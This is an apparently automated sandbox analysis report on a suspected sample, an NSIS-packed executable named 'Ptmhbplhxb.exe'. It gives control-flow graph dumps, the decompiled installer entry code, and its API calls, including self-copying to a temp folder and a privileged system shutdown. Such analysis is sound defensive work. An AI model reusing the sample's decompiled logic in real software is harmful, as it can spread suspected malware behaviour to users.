3945 404a5b 7 API calls 3944->3945 3959 404c73 3944->3959 3946 404af1 SendMessageA 3945->3946 3947 404afe DeleteObject 3945->3947 3946->3947 3948 404b07 3947->3948 3950 404b3e 3948->3950 3953 405f87 17 API calls 3948->3953 3949 404d57 3952 404e03 3949->3952 3955 404c66 3949->3955 3962 404db0 SendMessageA 3949->3962 3951 404026 18 API calls 3950->3951 3954 404b52 3951->3954 3956 404e15 3952->3956 3957 404e0d SendMessageA 3952->3957 3958 404b20 SendMessageA SendMessageA 3953->3958 3961 404026 18 API calls 3954->3961 3963 40408d 8 API calls 3955->3963 3965 404e27 ImageList_Destroy 3956->3965 3966 404e2e 3956->3966 3973 404e3e 3956->3973 3957->3956 3958->3948 3959->3949 3960 404957 5 API calls 3959->3960 3976 404ce4 3959->3976 3960->3976 3977 404b60 3961->3977 3962->3955 3968 404dc5 SendMessageA 3962->3968 3969 404ff9 3963->3969 3964 404d49 SendMessageA 3964->3949 3965->3966 3970 404e37 GlobalFree 3966->3970 3966->3973 3967 404fad 3967->3955 3974 404fbf ShowWindow GetDlgItem ShowWindow 3967->3974 3972 404dd8 3968->3972 3970->3973 3971 404c34 GetWindowLongA SetWindowLongA 3975 404c4d 3971->3975 3983 404de9 SendMessageA 3972->3983 3973->3967 3988 4049d7 4 API calls 3973->3988 3989 404e79 3973->3989 3974->3955 3978 404c53 ShowWindow 3975->3978 3979 404c6b 3975->3979 3976->3949 3976->3964 3977->3971 3982 404baf SendMessageA 3977->3982 3984 404c2e 3977->3984 3986 404beb SendMessageA 3977->3986 3987 404bfc SendMessageA 3977->3987 3995 40405b SendMessageA 3978->3995 3996 40405b SendMessageA 3979->3996 3982->3977 3983->3952 3984->3971 3984->3975 3985 404ebd 3990 404f83 InvalidateRect 3985->3990 3994 404f31 SendMessageA SendMessageA 3985->3994 3986->3977 3987->3977 3988->3989 3989->3985 3992 404ea7 SendMessageA 3989->3992 3990->3967 3991 404f99 3990->3991 3997 404912 3991->3997 3992->3985 3994->3985 3995->3955 3996->3959 4000 40484d 3997->4000 3999 404927 3999->3967 4001 404863 4000->4001 4002 405f87 17 API calls 4001->4002 4003 4048c7 4002->4003 4004 405f87 17 API calls 4003->4004 4005 4048d2 4004->4005 4006 405f87 17 API calls 4005->4006 4007 4048e8 lstrlenA wsprintfA SetDlgItemTextA 4006->4007 4007->3999 4008 401490 4009 40508c 24 API calls 4008->4009 4010 401497 4009->4010 4011 401d95 GetDC 4012 402a9f 17 API calls 4011->4012 4013 401da7 GetDeviceCaps MulDiv ReleaseDC 4012->4013 4014 402a9f 17 API calls 4013->4014 4015 401dd8 4014->4015 4016 405f87 17 API calls 4015->4016 4017 401e15 CreateFontIndirectA 4016->4017 4018 402577 4017->4018 4019 404496 4020 4044c2 4019->4020 4021 4044d3 4019->4021 4080 405665 GetDlgItemTextA 4020->4080 4022 4044df GetDlgItem 4021->4022 4030 40453e 4021->4030 4025 4044f3 4022->4025 4024 4044cd 4027 4061cf 5 API calls 4024->4027 4028 404507 SetWindowTextA 4025->4028 4033 405996 4 API calls 4025->4033 4026 404622 4029 4047cc 4026->4029 4082 405665 GetDlgItemTextA 4026->4082 4027->4021 4034 404026 18 API calls 4028->4034 4032 40408d 8 API calls 4029->4032 4030->4026 4030->4029 4035 405f87 17 API calls 4030->4035 4037 4047e0 4032->4037 4038 4044fd 4033->4038 4039 404523 4034->4039 4040 4045b2 SHBrowseForFolderA 4035->4040 4036 404652 4041 4059eb 18 API calls 4036->4041 4038->4028 4045 4058fd 3 API calls 4038->4045 4042 404026 18 API calls 4039->4042 4040->4026 4043 4045ca CoTaskMemFree 4040->4043 4044 404658 4041->4044 4046 404531 4042->4046 4047 4058fd 3 API calls 4043->4047 4083 405f65 lstrcpynA 4044->4083 4045->4028 4081 40405b SendMessageA 4046->4081 4049 4045d7 4047->4049 4052 40460e SetDlgItemTextA 4049->4052 4056 405f87 17 API calls 4049->4056 4051 404537 4054 4062fd 5 API calls 4051->4054 4052->4026 4053 40466f 4055 4062fd 5 API calls 4053->4055 4054->4030 4063 404676 4055->4063 4057 4045f6 lstrcmpiA 4056->4057 4057->4052 4059 404607 lstrcatA 4057->4059 4058 4046b2 4084 405f65 lstrcpynA 4058->4084 4059->4052 4061 4046b9 4062 405996 4 API calls 4061->4062 4064 4046bf GetDiskFreeSpaceA 4062->4064 4063->4058 4067 405944 2 API calls 4063->4067 4069 40470a 4063->4069 4066 4046e3 MulDiv 4064->4066 4064->4069 4066->4069 4067->4063 4068 40477b 4071 40479e 4068->4071 4073 40140b 2 API calls 4068->4073 4069->4068 4070 404912 20 API calls 4069->4070 4072 404768 4070->4072 4085 404048 EnableWindow 4071->4085 4074 40477d SetDlgItemTextA 4072->4074 4075 40476d 4072->4075 4073->4071 4074->4068 4077 40484d 20 API calls 4075->4077 4077->4068 4078 4047ba 4078->4029 4079 4043ef SendMessageA 4078->4079 4079->4029 4080->4024 4081->4051 4082->4036 4083->4053 4084->4061 4085->4078 4086 401d1a 4087 402a9f 17 API calls 4086->4087 4088 401d28 SetWindowLongA 4087->4088 4089 402951 4088->4089 4095 40149d 4096 4022e1 4095->4096 4097 4014ab PostQuitMessage 4095->4097 4097->4096 4098 40159d 4099 402ac1 17 API calls 4098->4099 4100 4015a4 SetFileAttributesA 4099->4100 4101 4015b6 4100->4101 4102 401a1e 4103 402ac1 17 API calls 4102->4103 4104 401a27 ExpandEnvironmentStringsA 4103->4104 4105 401a3b 4104->4105 4107 401a4e 4104->4107 4106 401a40 lstrcmpA 4105->4106 4105->4107 4106->4107 4108 40171f 4109 402ac1 17 API calls 4108->4109 4110 401726 SearchPathA 4109->4110 4111 401741 4110->4111 4112 401e25 4113 402a9f 17 API calls 4112->4113 4114 401e2b 4113->4114 4115 402a9f 17 API calls 4114->4115 4116 401e37 4115->4116 4117 401e43 ShowWindow 4116->4117 4118 401e4e EnableWindow 4116->4118 4119 402951 4117->4119 4118->4119 4120 401f2b 4121 402ac1 17 API calls 4120->4121 4122 401f32 4121->4122 4123 406268 2 API calls 4122->4123 4124 401f38 4123->4124 4126 401f4a 4124->4126 4127 405ec3 wsprintfA 4124->4127 4127->4126 4128 40292c SendMessageA 4129 402946 InvalidateRect 4128->4129 4130 402951 4128->4130 4129->4130 3211 401932 3212 401934 3211->3212 3217 402ac1 3212->3217 3218 402acd 3217->3218 3219 405f87 17 API calls 3218->3219 3220 402aee 3219->3220 3221 401939 3220->3221 3222 4061cf 5 API calls 3220->3222 3223 40572d 3221->3223 3222->3221 3224 4059eb 18 API calls 3223->3224 3225 40574d 3224->3225 3226 405755 DeleteFileA 3225->3226 3227 40576c 3225->3227 3228 401942 3226->3228 3230 40589a 3227->3230 3260 405f65 lstrcpynA 3227->3260 3230->3228 3236 406268 2 API calls 3230->3236 3231 405792 3232 4057a5 3231->3232 3233 405798 lstrcatA 3231->3233 3235 405944 2 API calls 3232->3235 3234 4057ab 3233->3234 3237 4057b9 lstrcatA 3234->3237 3239 4057c4 lstrlenA FindFirstFileA 3234->3239 3235->3234 3238 4058be 3236->3238 3237->3239 3238->3228 3240 4058fd 3 API calls 3238->3240 3239->3230 3252 4057e8 3239->3252 3241 4058c8 3240->3241 3243 4056e5 5 API calls 3241->3243 3242 405928 CharNextA 3242->3252 3244 4058d4 3243->3244 3245 4058d8 3244->3245 3246 4058ee 3244->3246 3245->3228 3251 40508c 24 API calls 3245->3251 3249 40508c 24 API calls 3246->3249 3247 405879 FindNextFileA 3250 405891 FindClose 3247->3250 3247->3252 3249->3228 3250->3230 3253 4058e5 3251->3253 3252->3242 3252->3247 3256 40572d 60 API calls 3252->3256 3257 40508c 24 API calls 3252->3257 3258 40508c 24 API calls 3252->3258 3259 405d44 36 API calls 3252->3259 3261 405f65 lstrcpynA 3252->3261 3262 4056e5 3252->3262 3254 405d44 36 API calls 3253->3254 3254->3228 3256->3252 3257->3247 3258->3252 3259->3252 3260->3231 3261->3252 3270 405ad9 GetFileAttributesA 3262->3270 3265 405712 3265->3252 3266 405700 RemoveDirectoryA 3268 40570e 3266->3268 3267 405708 DeleteFileA 3267->3268 3268->3265 3269 40571e SetFileAttributesA 3268->3269 3269->3265 3271 4056f1 3270->3271 3272 405aeb SetFileAttributesA 3270->3272 3271->3265 3271->3266 3271->3267 3272->3271 4131 4026b4 4132 4026ba 4131->4132 4133 402951 4132->4133 4134 4026c2 FindClose 4132->4134 4134->4133 4135 402736 4136 402ac1 17 API calls 4135->4136 4137 402744 4136->4137 4138 40275a 4137->4138 4139 402ac1 17 API calls 4137->4139 4140 405ad9 2 API calls 4138->4140 4139->4138 4141 402760 4140->4141 4163 405afe GetFileAttributesA CreateFileA 4141->4163 4143 40276d 4144 402816 4143->4144 4145 402779 GlobalAlloc 4143->4145 4148 402831 4144->4148 4149 40281e DeleteFileA 4144->4149 4146 402792 4145->4146 4147 40280d CloseHandle 4145->4147 4164 4031a9 SetFilePointer 4146->4164 4147->4144 4149->4148 4151 402798 4152 403193 ReadFile 4151->4152 4153 4027a1 GlobalAlloc 4152->4153 4154 4027b1 4153->4154 4155 4027eb 4153->4155 4157 402f81 31 API calls 4154->4157 4156 405ba5 WriteFile 4155->4156 4158 4027f7 GlobalFree 4156->4158 4162 4027be 4157->4162 4159 402f81 31 API calls 4158->4159 4160 40280a 4159->4160 4160->4147 4161 4027e2 GlobalFree 4161->4155 4162->4161 4163->4143 4164->4151 4165 402837 4166 402a9f 17 API calls 4165->4166 4167 40283d 4166->4167 4168 402865 4167->4168 4169 40287c 4167->4169 4177 402716 4167->4177 4172 402879 4168->4172 4173 40286a 4168->4173 4170 402896 4169->4170 4171 402886 4169->4171 4175 405f87 17 API calls 4170->4175 4174 402a9f 17 API calls 4171->4174 4180 405ec3 wsprintfA 4172->4180 4179 405f65 lstrcpynA 4173->4179 4174->4177 4175->4177 4179->4177 4180->4177 4181 4014b7 4182 4014bd 4181->4182 4183 401389 2 API calls 4182->4183 4184 4014c5 4183->4184 4185 401b39 4186 402ac1 17 API calls 4185->4186 4187 401b40 4186->4187 4188 402a9f 17 API calls 4187->4188 4189 401b49 wsprintfA 4188->4189 4190 402951 4189->4190 4191 40413a lstrcpynA lstrlenA 4192 40233a 4193 402ac1 17 API calls 4192->4193 4194 40234b 4193->4194 4195 402ac1 17 API calls 4194->4195 4196 402354 4195->4196 4197 402ac1 17 API calls 4196->4197 4198 40235e GetPrivateProfileStringA 4197->4198 3335 4015bb 3336 402ac1 17 API calls 3335->3336 3337 4015c2 3336->3337 3338 405996 4 API calls 3337->3338 3351 4015ca 3338->3351 3339 401624 3341 401652 3339->3341 3342 401629 3339->3342 3340 405928 CharNextA 3340->3351 3344 401423 24 API calls 3341->3344 3354 401423 3342->3354 3348 40164a 3344->3348 3347 4055cf 2 API calls 3347->3351 3349 4055ec 5 API calls 3349->3351 3350 40163b SetCurrentDirectoryA 3350->3348 3351->3339 3351->3340 3351->3347 3351->3349 3352 40160c GetFileAttributesA 3351->3352 3353 405552 4 API calls 3351->3353 3352->3351 3353->3351 3355 40508c 24 API calls 3354->3355 3356 401431 3355->3356 3357 405f65 lstrcpynA 3356->3357 3357->3350 4199 401d3b GetDlgItem GetClientRect 4200 402ac1 17 API calls 4199->4200 4201 401d6b LoadImageA SendMessageA 4200->4201 4202 401d89 DeleteObject 4201->4202 4203 402951 4201->4203 4202->4203 4204 4016bb 4205 402ac1 17 API calls 4204->4205 4206 4016c1 GetFullPathNameA 4205->4206 4207 4016d8 4206->4207 4213 4016f9 4206->4213 4210 406268 2 API calls 4207->4210 4207->4213 4208 402951 4209 40170d GetShortPathNameA 4209->4208 4211 4016e9 4210->4211 4211->4213 4214 405f65 lstrcpynA 4211->4214 4213->4208 4213->4209 4214->4213

                Executed Functions

                Function 004031F1 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 368stringcomfileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 4031f1-403230 SetErrorMode GetVersion 1 403232-40323a call 4062fd 0->1 2 403243 0->2 1->2 7 40323c 1->7 4 403248-40325b call 40628f lstrlenA 2->4 9 40325d-403279 call 4062fd * 3 4->9 7->2 16 40328a-4032ea #17 OleInitialize SHGetFileInfoA call 405f65 GetCommandLineA call 405f65 GetModuleHandleA 9->16 17 40327b-403281 9->17 24 4032f6-40330b call 405928 CharNextA 16->24 25 4032ec-4032f1 16->25 17->16 21 403283 17->21 21->16 28 4033d0-4033d4 24->28 25->24 29 403310-403313 28->29 30 4033da 28->30 32 403315-403319 29->32 33 40331b-403323 29->33 31 4033ed-403407 GetTempPathA call 4031c0 30->31 42 403409-403427 GetWindowsDirectoryA lstrcatA call 4031c0 31->42 43 40345f-403479 DeleteFileA call 402d48 31->43 32->32 32->33 34 403325-403326 33->34 35 40332b-40332e 33->35 34->35 37 4033c0-4033cd call 405928 35->37 38 403334-403338 35->38 37->28 57 4033cf 37->57 40 403350-40337d 38->40 41 40333a-403340 38->41 47 403390-4033be 40->47 48 40337f-403385 40->48 45 403342-403344 41->45 46 403346 41->46 42->43 61 403429-403459 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031c0 42->61 58 40350d-40351d ExitProcess OleUninitialize 43->58 59 40347f-403485 43->59 45->40 45->46 46->40 47->37 55 4033dc-4033e8 call 405f65 47->55 52 403387-403389 48->52 53 40338b 48->53 52->47 52->53 53->47 55->31 57->28 64 403641-403647 58->64 65 403523-403533 call 405681 ExitProcess 58->65 62 403487-403492 call 405928 59->62 63 4034fd-403504 call 4037b5 59->63 61->43 61->58 80 403494-4034bd 62->80 81 4034c8-4034d2 62->81 73 403509 63->73 70 4036c3-4036cb 64->70 71 403649-403662 GetCurrentProcess OpenProcessToken 64->71 75 4036d1-4036d5 ExitProcess 70->75 76 4036cd 70->76 78 403694-4036a2 call 4062fd 71->78 79 403664-40368e LookupPrivilegeValueA AdjustTokenPrivileges 71->79 73->58 76->75 90 4036b0-4036ba ExitWindowsEx 78->90 91 4036a4-4036ae 78->91 79->78 83 4034bf-4034c1 80->83 84 4034d4-4034e1 call 4059eb 81->84 85 403539-40354d call 4055ec lstrcatA 81->85 83->81 87 4034c3-4034c6 83->87 84->58 99 4034e3-4034f9 call 405f65 * 2 84->99 97 40355a-403574 lstrcatA lstrcmpiA 85->97 98 40354f-403555 lstrcatA 85->98 87->81 87->83 90->70 92 4036bc-4036be call 40140b 90->92 91->90 91->92 92->70 97->58 100 403576-403579 97->100 98->97 99->63 102 403582 call 4055cf 100->102 103 40357b-403580 call 405552 100->103 108 403587-403594 SetCurrentDirectoryA 102->108 103->108 111 4035a1-4035c9 call 405f65 108->111 112 403596-40359c call 405f65 108->112 116 4035cf-4035eb call 405f87 DeleteFileA 111->116 112->111 119 40362c-403633 116->119 120 4035ed-4035fd CopyFileA 116->120 119->116 121 403635-40363c call 405d44 119->121 120->119 122 4035ff-40361f call 405d44 call 405f87 call 405604 120->122 121->58 122->119 131 403621-403628 CloseHandle 122->131 131->119
                C-Code - Quality: 85%
                			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				intOrPtr _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f40c = _t42;
				if(_t42 != 6) {
					_t119 = E004062FD(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E0040628F(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E004062FD(0xa);
				 *0x42f404 = E004062FD(8);
				_t47 = E004062FD(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f40f =  *0x42f40f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4d8 = _t47;
				SHGetFileInfoA(0x429830, 0, _t164 + 0x38, 0x160, 0); // executed
				E00405F65("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe\"";
				E00405F65(_t160, _t51);
				 *0x42f400 = GetModuleHandleA(0);
				_t54 = _t160;
				if("\"C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe\"" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t54 =  &M00435001;
				}
				_t56 = CharNextA(E00405928(_t54,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t56;
				while(1) {
					_t122 =  *_t56;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t56 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L25:
							_t56 = E00405928(_t56,  *(_t164 + 0x14));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 != 0x53) {
								L20:
								__eflags =  *_t56 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t56 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t56 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t56 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t56 - 2)) = 0;
										__eflags =  &(_t56[2]);
										E00405F65(0x435400,  &(_t56[2]));
										L30:
										_t157 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t60 = E004031C0(_t172);
										_t173 = _t60;
										if(_t60 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t62 = E00402D48(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t62;
											if(_t62 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4b4;
													if( *0x42f4b4 == 0) {
														L67:
														_t63 =  *0x42f4cc;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E004062FD(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405681( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f420 == 0) {
												L42:
												 *0x42f4cc =  *0x42f4cc | 0xffffffff;
												 *(_t164 + 0x18) = E004037B5( *0x42f4cc);
												goto L43;
											}
											_t153 = E00405928(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004055EC(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\frontdesk\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\frontdesk\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004055CF();
														} else {
															E00405552();
														}
														SetCurrentDirectoryA(_t157);
														_t189 =  *0x435400; // 0x0
														if(_t189 == 0) {
															E00405F65(0x435400, _t162);
														}
														E00405F65(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E00405F87(0, 0x429430, _t157, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x120)));
															DeleteFileA(0x429430);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\frontdesk\\Desktop\\Ptmhbplhxb.exe", 0x429430, 1) != 0) {
																E00405D44(_t137, 0x429430, 0);
																E00405F87(0, 0x429430, _t157, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x124)));
																_t94 = E00405604(0x429430);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405D44(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E004059EB(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00405F65(0x435400, _t154);
												E00405F65("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E004031C0(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E004031C0(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t56[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t56[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4c0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                0x00403201
                0x00403205
                0x0040320d
                0x00403211
                0x00403216
                0x00403222
                0x0040322b
                0x00403230
                0x00403233
                0x0040323a
                0x00403241
                0x00403241
                0x0040323a
                0x00403243
                0x00403248
                0x00403249
                0x00403255
                0x00403259
                0x0040325f
                0x0040326d
                0x00403272
                0x00403279
                0x0040327d
                0x00403281
                0x00403283
                0x00403283
                0x00403281
                0x0040328b
                0x00403292
                0x00403298
                0x004032ae
                0x004032be
                0x004032c3
                0x004032c9
                0x004032d0
                0x004032e3
                0x004032e8
                0x004032ea
                0x004032ec
                0x004032f1
                0x004032f1
                0x00403301
                0x00403307
                0x004033d0
                0x004033d0
                0x004033d2
                0x004033d4
                0x00000000
                0x00000000
                0x00403310
                0x00403313
                0x0040331b
                0x0040331b
                0x0040331e
                0x00403323
                0x00403325
                0x00403325
                0x00403326
                0x00403326
                0x0040332b
                0x0040332e
                0x004033c0
                0x004033c5
                0x004033ca
                0x004033cd
                0x004033cf
                0x004033cf
                0x004033cf
                0x00000000
                0x00403334
                0x00403334
                0x00403335
                0x00403338
                0x00403350
                0x0040337b
                0x0040337d
                0x00403390
                0x004033bb
                0x004033be
                0x004033dc
                0x004033df
                0x004033e8
                0x004033ed
                0x004033f3
                0x004033fe
                0x00403400
                0x00403405
                0x00403407
                0x0040345f
                0x00403464
                0x0040346e
                0x00403475
                0x00403479
                0x0040350d
                0x0040350d
                0x00403512
                0x00403518
                0x0040351d
                0x00403641
                0x00403647
                0x004036c3
                0x004036c3
                0x004036c8
                0x004036cb
                0x004036cd
                0x004036cd
                0x004036d5
                0x004036d5
                0x00403657
                0x0040365f
                0x00403661
                0x00403662
                0x0040366f
                0x00403682
                0x0040368a
                0x0040368e
                0x0040368e
                0x00403696
                0x0040369b
                0x004036a2
                0x004036b0
                0x004036b2
                0x004036b8
                0x004036ba
                0x00000000
                0x00000000
                0x00000000
                0x004036a4
                0x004036aa
                0x004036ac
                0x004036ae
                0x004036bc
                0x004036be
                0x00000000
                0x004036be
                0x00000000
                0x004036ae
                0x004036a2
                0x0040352c
                0x00403533
                0x00403533
                0x00403485
                0x004034fd
                0x004034fd
                0x00403509
                0x00000000
                0x00403509
                0x0040348e
                0x00403492
                0x004034c8
                0x004034c8
                0x004034ca
                0x004034d2
                0x00403544
                0x00403546
                0x0040354d
                0x00403555
                0x00403555
                0x00403560
                0x00403565
                0x00403574
                0x00403578
                0x00403579
                0x00403582
                0x0040357b
                0x0040357b
                0x0040357b
                0x00403588
                0x0040358e
                0x00403594
                0x0040359c
                0x0040359c
                0x004035aa
                0x004035af
                0x004035c1
                0x004035c9
                0x004035cf
                0x004035db
                0x004035e1
                0x004035eb
                0x00403601
                0x00403612
                0x00403618
                0x0040361f
                0x00403622
                0x00403628
                0x00403628
                0x0040361f
                0x0040362c
                0x00403632
                0x00403632
                0x00403637
                0x00403637
                0x00000000
                0x00403574
                0x004034d4
                0x004034d6
                0x004034e1
                0x00000000
                0x00000000
                0x004034e9
                0x004034f4
                0x004034f9
                0x00000000
                0x004034f9
                0x004034bd
                0x004034bf
                0x004034c3
                0x004034c6
                0x00000000
                0x00000000
                0x00000000
                0x004034c6
                0x00000000
                0x004034bf
                0x0040340f
                0x0040341b
                0x00403420
                0x00403425
                0x00403427
                0x00000000
                0x00000000
                0x0040342f
                0x00403437
                0x00403448
                0x00403450
                0x00403452
                0x00403457
                0x00403459
                0x00000000
                0x00000000
                0x00000000
                0x00403459
                0x00000000
                0x004033be
                0x0040337f
                0x00403382
                0x00403385
                0x0040338b
                0x0040338b
                0x0040338b
                0x0040338b
                0x00000000
                0x0040338b
                0x00403387
                0x00403389
                0x00000000
                0x00000000
                0x00000000
                0x00403389
                0x0040333a
                0x0040333d
                0x00403340
                0x00403346
                0x00403346
                0x00000000
                0x00403346
                0x00403342
                0x00403344
                0x00000000
                0x00000000
                0x00000000
                0x00403344
                0x00000000
                0x00000000
                0x00000000
                0x00403315
                0x00403315
                0x00403315
                0x00403316
                0x00403316
                0x00000000
                0x00403315
                0x00000000

                APIs
                • SetErrorMode.KERNELBASE ref: 00403216
                • GetVersion.KERNEL32 ref: 0040321C
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
                • OleInitialize.OLE32(00000000), ref: 00403292
                • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
                • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
                • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
                • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
